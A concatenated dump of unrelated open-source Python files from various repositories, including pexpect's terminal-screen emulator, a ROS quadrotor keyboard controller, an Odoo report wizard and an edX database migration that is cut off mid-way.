def test_empty_pool(self):
# Start a mcrouter without route handles
key = 'foo'
mcrouter_w_rh = self.get_mcrouter()
self.assertIsNone(mcrouter_w_rh.get(key))
|
dushu1203/chromium.src
|
refs/heads/nw12
|
third_party/pexpect/screen.py
|
171
|
"""This implements a virtual screen. This is used to support ANSI terminal
emulation. The screen representation and state is implemented in this class.
Most of the methods are inspired by ANSI screen control codes. The ANSI class
extends this class to add parsing of ANSI escape codes.
PEXPECT LICENSE
This license is approved by the OSI and FSF as GPL-compatible.
http://opensource.org/licenses/isc-license.txt
Copyright (c) 2012, Noah Spurrier <[email protected]>
PERMISSION TO USE, COPY, MODIFY, AND/OR DISTRIBUTE THIS SOFTWARE FOR ANY
PURPOSE WITH OR WITHOUT FEE IS HEREBY GRANTED, PROVIDED THAT THE ABOVE
COPYRIGHT NOTICE AND THIS PERMISSION NOTICE APPEAR IN ALL COPIES.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
import copy
NUL = 0 # Fill character; ignored on input.
ENQ = 5 # Transmit answerback message.
BEL = 7 # Ring the bell.
BS = 8 # Move cursor left.
HT = 9 # Move cursor to next tab stop.
LF = 10 # Line feed.
VT = 11 # Same as LF.
FF = 12 # Same as LF.
CR = 13 # Move cursor to left margin or newline.
SO = 14 # Invoke G1 character set.
SI = 15 # Invoke G0 character set.
XON = 17 # Resume transmission.
XOFF = 19 # Halt transmission.
CAN = 24 # Cancel escape sequence.
SUB = 26 # Same as CAN.
ESC = 27 # Introduce a control sequence.
DEL = 127 # Fill character; ignored on input.
SPACE = chr(32) # Space or blank character.
def constrain (n, min, max):
"""This returns a number, n constrained to the min and max bounds. """
if n < min:
return min
if n > max:
return max
return n
class screen:
"""This object maintains the state of a virtual text screen as a
    rectangular array. This maintains a virtual cursor position and handles
scrolling as characters are added. This supports most of the methods needed
by an ANSI text screen. Row and column indexes are 1-based (not zero-based,
like arrays). """
def __init__ (self, r=24,c=80):
"""This initializes a blank scree of the given dimentions."""
self.rows = r
self.cols = c
self.cur_r = 1
self.cur_c = 1
self.cur_saved_r = 1
self.cur_saved_c = 1
self.scroll_row_start = 1
self.scroll_row_end = self.rows
self.w = [ [SPACE] * self.cols for c in range(self.rows)]
def __str__ (self):
"""This returns a printable representation of the screen. The end of
each screen line is terminated by a newline. """
return '\n'.join ([ ''.join(c) for c in self.w ])
def dump (self):
"""This returns a copy of the screen as a string. This is similar to
__str__ except that lines are not terminated with line feeds. """
return ''.join ([ ''.join(c) for c in self.w ])
def pretty (self):
"""This returns a copy of the screen as a string with an ASCII text box
around the screen border. This is similar to __str__ except that it
adds a box. """
top_bot = '+' + '-'*self.cols + '+\n'
return top_bot + '\n'.join(['|'+line+'|' for line in str(self).split('\n')]) + '\n' + top_bot
def fill (self, ch=SPACE):
self.fill_region (1,1,self.rows,self.cols, ch)
def fill_region (self, rs,cs, re,ce, ch=SPACE):
rs = constrain (rs, 1, self.rows)
re = constrain (re, 1, self.rows)
cs = constrain (cs, 1, self.cols)
ce = constrain (ce, 1, self.cols)
if rs > re:
rs, re = re, rs
if cs > ce:
cs, ce = ce, cs
for r in range (rs, re+1):
for c in range (cs, ce + 1):
self.put_abs (r,c,ch)
def cr (self):
"""This moves the cursor to the beginning (col 1) of the current row.
"""
self.cursor_home (self.cur_r, 1)
def lf (self):
"""This moves the cursor down with scrolling.
"""
old_r = self.cur_r
self.cursor_down()
if old_r == self.cur_r:
self.scroll_up ()
self.erase_line()
def crlf (self):
"""This advances the cursor with CRLF properties.
The cursor will line wrap and the screen may scroll.
"""
self.cr ()
self.lf ()
def newline (self):
"""This is an alias for crlf().
"""
self.crlf()
def put_abs (self, r, c, ch):
"""Screen array starts at 1 index."""
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
ch = str(ch)[0]
self.w[r-1][c-1] = ch
def put (self, ch):
"""This puts a characters at the current cursor position.
"""
self.put_abs (self.cur_r, self.cur_c, ch)
def insert_abs (self, r, c, ch):
"""This inserts a character at (r,c). Everything under
and to the right is shifted right one character.
The last character of the line is lost.
"""
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
for ci in range (self.cols, c, -1):
self.put_abs (r,ci, self.get_abs(r,ci-1))
self.put_abs (r,c,ch)
def insert (self, ch):
self.insert_abs (self.cur_r, self.cur_c, ch)
def get_abs (self, r, c):
r = constrain (r, 1, self.rows)
c = constrain (c, 1, self.cols)
return self.w[r-1][c-1]
    def get (self):
        return self.get_abs (self.cur_r, self.cur_c)
def get_region (self, rs,cs, re,ce):
"""This returns a list of lines representing the region.
"""
rs = constrain (rs, 1, self.rows)
re = constrain (re, 1, self.rows)
cs = constrain (cs, 1, self.cols)
ce = constrain (ce, 1, self.cols)
if rs > re:
rs, re = re, rs
if cs > ce:
cs, ce = ce, cs
sc = []
for r in range (rs, re+1):
line = ''
for c in range (cs, ce + 1):
ch = self.get_abs (r,c)
line = line + ch
sc.append (line)
return sc
def cursor_constrain (self):
"""This keeps the cursor within the screen area.
"""
self.cur_r = constrain (self.cur_r, 1, self.rows)
self.cur_c = constrain (self.cur_c, 1, self.cols)
def cursor_home (self, r=1, c=1): # <ESC>[{ROW};{COLUMN}H
self.cur_r = r
self.cur_c = c
self.cursor_constrain ()
def cursor_back (self,count=1): # <ESC>[{COUNT}D (not confused with down)
self.cur_c = self.cur_c - count
self.cursor_constrain ()
def cursor_down (self,count=1): # <ESC>[{COUNT}B (not confused with back)
self.cur_r = self.cur_r + count
self.cursor_constrain ()
def cursor_forward (self,count=1): # <ESC>[{COUNT}C
self.cur_c = self.cur_c + count
self.cursor_constrain ()
def cursor_up (self,count=1): # <ESC>[{COUNT}A
self.cur_r = self.cur_r - count
self.cursor_constrain ()
def cursor_up_reverse (self): # <ESC> M (called RI -- Reverse Index)
old_r = self.cur_r
self.cursor_up()
if old_r == self.cur_r:
self.scroll_up()
def cursor_force_position (self, r, c): # <ESC>[{ROW};{COLUMN}f
"""Identical to Cursor Home."""
self.cursor_home (r, c)
def cursor_save (self): # <ESC>[s
"""Save current cursor position."""
self.cursor_save_attrs()
def cursor_unsave (self): # <ESC>[u
"""Restores cursor position after a Save Cursor."""
self.cursor_restore_attrs()
def cursor_save_attrs (self): # <ESC>7
"""Save current cursor position."""
self.cur_saved_r = self.cur_r
self.cur_saved_c = self.cur_c
def cursor_restore_attrs (self): # <ESC>8
"""Restores cursor position after a Save Cursor."""
self.cursor_home (self.cur_saved_r, self.cur_saved_c)
def scroll_constrain (self):
"""This keeps the scroll region within the screen region."""
if self.scroll_row_start <= 0:
self.scroll_row_start = 1
if self.scroll_row_end > self.rows:
self.scroll_row_end = self.rows
def scroll_screen (self): # <ESC>[r
"""Enable scrolling for entire display."""
self.scroll_row_start = 1
self.scroll_row_end = self.rows
def scroll_screen_rows (self, rs, re): # <ESC>[{start};{end}r
"""Enable scrolling from row {start} to row {end}."""
self.scroll_row_start = rs
self.scroll_row_end = re
self.scroll_constrain()
def scroll_down (self): # <ESC>D
"""Scroll display down one line."""
# Screen is indexed from 1, but arrays are indexed from 0.
s = self.scroll_row_start - 1
e = self.scroll_row_end - 1
self.w[s+1:e+1] = copy.deepcopy(self.w[s:e])
def scroll_up (self): # <ESC>M
"""Scroll display up one line."""
# Screen is indexed from 1, but arrays are indexed from 0.
s = self.scroll_row_start - 1
e = self.scroll_row_end - 1
self.w[s:e] = copy.deepcopy(self.w[s+1:e+1])
def erase_end_of_line (self): # <ESC>[0K -or- <ESC>[K
"""Erases from the current cursor position to the end of the current
line."""
self.fill_region (self.cur_r, self.cur_c, self.cur_r, self.cols)
def erase_start_of_line (self): # <ESC>[1K
"""Erases from the current cursor position to the start of the current
line."""
self.fill_region (self.cur_r, 1, self.cur_r, self.cur_c)
def erase_line (self): # <ESC>[2K
"""Erases the entire current line."""
self.fill_region (self.cur_r, 1, self.cur_r, self.cols)
def erase_down (self): # <ESC>[0J -or- <ESC>[J
"""Erases the screen from the current line down to the bottom of the
screen."""
self.erase_end_of_line ()
self.fill_region (self.cur_r + 1, 1, self.rows, self.cols)
def erase_up (self): # <ESC>[1J
"""Erases the screen from the current line up to the top of the
screen."""
self.erase_start_of_line ()
self.fill_region (self.cur_r-1, 1, 1, self.cols)
def erase_screen (self): # <ESC>[2J
"""Erases the screen with the background color."""
self.fill ()
def set_tab (self): # <ESC>H
"""Sets a tab at the current position."""
pass
def clear_tab (self): # <ESC>[g
"""Clears tab at the current position."""
pass
def clear_all_tabs (self): # <ESC>[3g
"""Clears all tabs."""
pass
# Insert line Esc [ Pn L
# Delete line Esc [ Pn M
# Delete character Esc [ Pn P
# Scrolling region Esc [ Pn(top);Pn(bot) r
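# --- Illustrative usage sketch, not part of the original module ---
# A 3x10 virtual screen: write a word at the home position, advance the cursor
# after each character, wrap to the next line, and render with an ASCII border.
if __name__ == '__main__':
    s = screen(3, 10)
    for ch in 'hello':
        s.put(ch)
        s.cursor_forward()
    s.crlf()
    s.put('!')
    print(s.pretty())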
|
kimoonkim/spark
|
refs/heads/branch-2.1-kubernetes
|
python/pyspark/mllib/__init__.py
|
123
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
RDD-based machine learning APIs for Python (in maintenance mode).
The `pyspark.mllib` package is in maintenance mode as of the Spark 2.0.0 release to encourage
migration to the DataFrame-based APIs under the `pyspark.ml` package.
"""
from __future__ import absolute_import
# MLlib currently needs NumPy 1.4+, so complain if lower
import numpy
ver = [int(x) for x in numpy.version.version.split('.')[:2]]
if ver < [1, 4]:
raise Exception("MLlib requires NumPy 1.4+")
__all__ = ['classification', 'clustering', 'feature', 'fpm', 'linalg', 'random',
'recommendation', 'regression', 'stat', 'tree', 'util']
|
18514253911/directive-demo
|
refs/heads/master
|
node_modules/node-gyp/gyp/setup.py
|
2462
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from setuptools import setup
setup(
name='gyp',
version='0.1',
description='Generate Your Projects',
author='Chromium Authors',
author_email='[email protected]',
url='http://code.google.com/p/gyp',
package_dir = {'': 'pylib'},
packages=['gyp', 'gyp.generator'],
entry_points = {'console_scripts': ['gyp=gyp:script_main'] }
)
|
peick/docker-build
|
refs/heads/master
|
tests/raw/import_python_stdlib.py
|
1
|
import sys
version = sys.version
# reference to an existing docker image
Image('test/bary')
|
darshn/sim_test
|
refs/heads/master
|
scripts/keyboard_base_alt.py
|
2
|
import time, sys, math
import pygame
import rospy, tf
from geometry_msgs.msg import Twist, Pose, Quaternion
from gazebo_msgs.msg import ModelStates
from std_srvs.srv import Empty
class BaseKeyboardController:
def __init__(self):
self.gui_init()
self.rospy_init()
rospy.loginfo(rospy.get_name() + ' -- Initialization complete')
def gui_init(self):
pygame.init()
self.screen = pygame.display.set_mode([400, 500])
self.clock = pygame.time.Clock()
background = pygame.Surface(self.screen.get_size())
background = background.convert()
background.fill((250, 250, 250))
font = pygame.font.Font(None, 36)
text = font.render("Keyboard controller", 1, (10, 10, 10))
textpos = text.get_rect()
textpos.centerx = background.get_rect().centerx
background.blit(text, textpos)
font = pygame.font.Font(None, 30)
text = font.render("Not connected", 1, (200, 10, 10))
textpos = text.get_rect()
textpos.centerx = background.get_rect().centerx
textpos.centery = background.get_rect().centery
background.blit(text, textpos)
self.screen.blit(background, (0, 0))
pygame.display.flip()
def rospy_init(self, rate=100):
rospy.init_node('keyboard_controller', anonymous=True)
self.model_states = rospy.Subscriber(
'/gazebo/model_states',
ModelStates,
self.get_modelstates,
queue_size=10)
rospy.wait_for_service("/gazebo/reset_world")
self.gz_reset = rospy.ServiceProxy("/gazebo/reset_world", Empty)
self.quad_pose = Pose()
self.quad_twist = Twist()
self.rate = rospy.Rate(rate) # in Hz
# Needs to be overridden by child class
self.msg = None
def get_modelstates(self, data):
quad_id = None
for i, name in enumerate(data.name):
if name == 'quadrotor':
quad_id = i
break
        if quad_id is None:
return
self.quad_pose = data.pose[quad_id]
self.quad_twist = data.twist[quad_id]
def run(self):
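        # Main loop: translate key presses into incremental Twist commands,
        # redraw the status panel and publish self.msg at the configured rate.
        # self.msg and self.publisher are expected to be provided by a subclass.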
pygame.event.post(pygame.event.Event(pygame.KEYUP, key=pygame.K_0))
pygame.key.set_repeat(500, 30)
dx = dy = dz = 0.08
dax = day = daz = 0.08
twist_events = { # x, y, z, roll, pitch, yaw
pygame.K_w: [dx, 0, 0, 0, 0, 0],
pygame.K_s: [-dx, 0, 0, 0, 0, 0],
pygame.K_a: [0, dy, 0, 0, 0, 0],
pygame.K_d: [0, -dy, 0, 0, 0, 0],
pygame.K_UP: [0, 0, dz, 0, 0, 0],
pygame.K_DOWN: [0, 0, -dz, 0, 0, 0],
pygame.K_o: [0, 0, 0, dax, 0, 0],
pygame.K_u: [0, 0, 0, -dax, 0, 0],
pygame.K_l: [0, 0, 0, 0, day, 0],
pygame.K_j: [0, 0, 0, 0, -day, 0],
pygame.K_LEFT: [0, 0, 0, 0, 0, daz],
pygame.K_RIGHT: [0, 0, 0, 0, 0, -daz],
}
while not rospy.is_shutdown():
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_0:
assert self.gz_reset()
self.msg.linear.z = 0
self.msg.linear.y = 0
self.msg.linear.x = 0
self.msg.angular.x = 0
self.msg.angular.y = 0
self.msg.angular.z = 0
                    elif event.key in (pygame.K_UP, pygame.K_DOWN, pygame.K_w, pygame.K_s,
                                       pygame.K_a, pygame.K_d, pygame.K_LEFT, pygame.K_RIGHT):
x, y, z, ax, ay, az = twist_events[event.key]
self.msg.linear.x += x
self.msg.linear.y += y
self.msg.linear.z += z
self.msg.angular.x += ax
self.msg.angular.y += ay
self.msg.angular.z += az
else:
print('\nInvalid Key \n\n up_arrow and down_arrow for height control (Z-axis) \n a and d for left and right (Y-axis) \n w and s for forward and backward (X-axis) \n left_arrow and right_arrow for yaw')
elif event.type == pygame.KEYUP:
self.msg.linear.z = 0
self.msg.linear.y = 0
self.msg.linear.x = 0
self.msg.angular.z = 0
self.msg.angular.y = 0
self.msg.angular.x = 0
self.draw_now()
self.publisher.publish(self.msg)
self.sleep()
def event_handler(self, key_events):
raise NotImplementedError
def draw_now(self):
self.draw()
self.screen.blit(self.background, (0, 0))
pygame.display.flip()
def draw(self):
self.background = pygame.Surface(self.screen.get_size())
self.background = self.background.convert()
self.background.fill((250, 250, 250))
width = float(self.background.get_rect().width)
self._draw_y = 20
self._draw_x = width / 2
self._draw_text("Quadrotor state", 40)
old_draw_y = self._draw_y
self._draw_x = width / 4
self._draw_text("Position", 30)
self._draw_text("X : %.3f" % self.quad_pose.position.x)
self._draw_text("Y : %.3f" % self.quad_pose.position.y)
self._draw_text("Z : %.3f" % self.quad_pose.position.z)
self._draw_text("Linear velocity", 30)
self._draw_text("X : %.3f" % self.quad_twist.linear.x)
self._draw_text("Y : %.3f" % self.quad_twist.linear.y)
self._draw_text("Z : %.3f" % self.quad_twist.linear.z)
self._draw_y = old_draw_y # On the side
self._draw_x = width * 3 / 4
self._draw_text("Orientation", 30)
old_draw_y = self._draw_y
self._draw_x = width * 5 / 8
yaw, pitch, roll = tf.transformations.euler_from_quaternion(
self.msg_to_quaternion(self.quad_pose.orientation))
self._draw_text("R : %.3f" % math.degrees(roll))
self._draw_text("P : %.3f" % math.degrees(pitch))
self._draw_text("Y : %.3f" % math.degrees(yaw))
self._draw_y = old_draw_y
self._draw_x = width * 7 / 8
self._draw_text("X : %.3f" % self.quad_pose.orientation.x)
self._draw_text("Y : %.3f" % self.quad_pose.orientation.y)
self._draw_text("Z : %.3f" % self.quad_pose.orientation.z)
self._draw_text("W : %.3f" % self.quad_pose.orientation.w)
self._draw_x = width * 3 / 4
self._draw_text("Angular velocity", 30)
self._draw_text("X : %.3f" % self.quad_twist.angular.x)
self._draw_text("Y : %.3f" % self.quad_twist.angular.y)
self._draw_text("Z : %.3f" % self.quad_twist.angular.z)
def _draw_text(self, text, font_size=20, x=None, y=None):
x = x or self._draw_x
y = y or self._draw_y
font = pygame.font.Font(None, font_size)
text = font.render(text, 1, (10, 10, 10))
textpos = text.get_rect()
textpos.centerx = x
textpos.centery = y
self.background.blit(text, textpos)
self._draw_y += font_size + 5
@staticmethod
def msg_to_quaternion(q):
assert type(q) == Quaternion
# Quaternions in TF are normally SXYZ form
return [q.w, q.x, q.y, q.z]
def sleep(self):
self.rate.sleep()
|
sthenc/bss_tester
|
refs/heads/master
|
stari_kodovi/fft_test.py
|
1
|
#!/usr/bin/python
import scipy
import scipy.fftpack
import pylab
from scipy import pi
t = scipy.linspace(0,120,4000)
acc = lambda t: 10*scipy.cos(2*pi*10*t) #+ 5*scipy.sin(2*pi*8.0*t) #+ 2*scipy.random.random(len(t))
signal = acc(t)
FFT = abs(scipy.fft(signal))
freqs = scipy.fftpack.fftfreq(signal.size, t[1]-t[0])
pylab.subplot(211)
pylab.plot(t, signal)
pylab.subplot(212)
pylab.plot(freqs[0:len(freqs)/2],FFT[0:len(FFT)/2]) #20*scipy.log10(FFT),'x')
pylab.show()
|
odoousers2014/odoo
|
refs/heads/master
|
addons/account/wizard/account_report_partner_ledger.py
|
8
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
class account_partner_ledger(osv.osv_memory):
"""
This wizard will provide the partner Ledger report by periods, between any two dates.
"""
_name = 'account.partner.ledger'
_inherit = 'account.common.partner.report'
_description = 'Account Partner Ledger'
_columns = {
'initial_balance': fields.boolean('Include Initial Balances',
            help='If you selected to filter by date or period, this field allows you to add a row to display the amount of debit/credit/balance that precedes the filter you\'ve set.'),
'filter': fields.selection([('filter_no', 'No Filters'), ('filter_date', 'Date'), ('filter_period', 'Periods'), ('unreconciled', 'Unreconciled Entries')], "Filter by", required=True),
'page_split': fields.boolean('One Partner Per Page', help='Display Ledger Report with One partner per page'),
'amount_currency': fields.boolean("With Currency", help="It adds the currency column on report if the currency differs from the company currency."),
'journal_ids': fields.many2many('account.journal', 'account_partner_ledger_journal_rel', 'account_id', 'journal_id', 'Journals', required=True),
}
_defaults = {
'initial_balance': False,
'page_split': False,
}
def onchange_filter(self, cr, uid, ids, filter='filter_no', fiscalyear_id=False, context=None):
res = super(account_partner_ledger, self).onchange_filter(cr, uid, ids, filter=filter, fiscalyear_id=fiscalyear_id, context=context)
if filter in ['filter_no', 'unreconciled']:
if filter == 'unreconciled':
res['value'].update({'fiscalyear_id': False})
res['value'].update({'initial_balance': False, 'period_from': False, 'period_to': False, 'date_from': False ,'date_to': False})
return res
def _print_report(self, cr, uid, ids, data, context=None):
if context is None:
context = {}
data = self.pre_print_report(cr, uid, ids, data, context=context)
data['form'].update(self.read(cr, uid, ids, ['initial_balance', 'filter', 'page_split', 'amount_currency'])[0])
if data['form'].get('page_split') is True:
return self.pool['report'].get_action(cr, uid, [], 'account.report_partnerledgerother', data=data, context=context)
return self.pool['report'].get_action(cr, uid, [], 'account.report_partnerledger', data=data, context=context)
|
appleseedhq/cortex
|
refs/heads/master
|
python/IECoreMaya/FnOpHolder.py
|
5
|
##########################################################################
#
# Copyright (c) 2008-2011, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from FnParameterisedHolder import FnParameterisedHolder
import maya.cmds
class FnOpHolder( FnParameterisedHolder ) :
def __init__( self, objectOrObjectName ) :
FnParameterisedHolder.__init__( self, objectOrObjectName )
## Creates a new node holding a new instance of the op of the specified
# type and version. Returns an FnOpHolder instance attached to this node.
@staticmethod
def create( nodeName, opType, opVersion=None ) :
holder = maya.cmds.createNode( "ieOpHolderNode", name=nodeName, skipSelect=True )
fnOH = FnOpHolder( holder )
# not asking for undo, as this way we end up with a single undo action which will
# delete the node. otherwise we get two undo actions, one to revert the setParameterised()
# one to revert the createNode().
fnOH.setOp( opType, opVersion, undoable=False )
return fnOH
## Convenience function which calls setParameterised( opType, opVersion, "IECORE_OP_PATHS" )
def setOp( self, opType, opVersion=None, undoable=True ) :
self.setParameterised( opType, opVersion, "IECORE_OP_PATHS", undoable )
## Convenience function which returns getParameterised()[0]
def getOp( self ) :
return self.getParameterised()[0]
## Returns the maya node type that this function set operates on
@classmethod
def _mayaNodeType( cls ):
return "ieOpHolderNode"
|
agentxan/nzbToMedia
|
refs/heads/master
|
libs/jaraco/windows/api/environ.py
|
4
|
import ctypes.wintypes
SetEnvironmentVariable = ctypes.windll.kernel32.SetEnvironmentVariableW
SetEnvironmentVariable.restype = ctypes.wintypes.BOOL
SetEnvironmentVariable.argtypes = [ctypes.wintypes.LPCWSTR]*2
GetEnvironmentVariable = ctypes.windll.kernel32.GetEnvironmentVariableW
GetEnvironmentVariable.restype = ctypes.wintypes.BOOL
GetEnvironmentVariable.argtypes = [
ctypes.wintypes.LPCWSTR,
ctypes.wintypes.LPWSTR,
ctypes.wintypes.DWORD,
]
|
xfumihiro/powerline
|
refs/heads/develop
|
powerline/matchers/vim/__init__.py
|
21
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
from powerline.bindings.vim import vim_getbufoption, buffer_name
def help(matcher_info):
return str(vim_getbufoption(matcher_info, 'buftype')) == 'help'
def cmdwin(matcher_info):
name = buffer_name(matcher_info)
return name and os.path.basename(name) == b'[Command Line]'
def quickfix(matcher_info):
return str(vim_getbufoption(matcher_info, 'buftype')) == 'quickfix'
|
abdoosh00/edx-rtl-final
|
refs/heads/master
|
lms/djangoapps/shoppingcart/migrations/0002_auto__add_field_paidcourseregistration_mode.py
|
182
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'PaidCourseRegistration.mode'
db.add_column('shoppingcart_paidcourseregistration', 'mode',
self.gf('django.db.models.fields.SlugField')(default='honor', max_length=50),
keep_default=False)
def backwards(self, orm):
# Deleting field 'PaidCourseRegistration.mode'
db.delete_column('shoppingcart_paidcourseregistration', 'mode')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'shoppingcart.certificateitem': {
'Meta': {'object_name': 'CertificateItem', '_ormbases': ['shoppingcart.OrderItem']},
'course_enrollment': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['student.CourseEnrollment']"}),
'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'mode': ('django.db.models.fields.SlugField', [], {'max_length': '50'}),
'orderitem_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['shoppingcart.OrderItem']", 'unique': 'True', 'primary_key': 'True'})
},
'shoppingcart.order': {
'Meta': {'object_name': 'Order'},
'bill_to_cardtype': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'bill_to_ccnum': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_city': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_first': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_last': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}),
'bill_to_postalcode': ('django.db.models.fields.CharField', [], {'max_length': '16', 'blank': 'True'}),
'bill_to_state': ('django.db.models.fields.CharField', [], {'max_length': '8', 'blank': 'True'}),
'bill_to_street1': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'bill_to_street2': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'currency': ('django.db.models.fields.CharField', [], {'default': "'usd'", 'max_length': '8'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'processor_reply_dump': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'purchase_time': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'cart'", 'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'shoppingcart.orderitem': {
'Meta': {'object_name': 'OrderItem'},
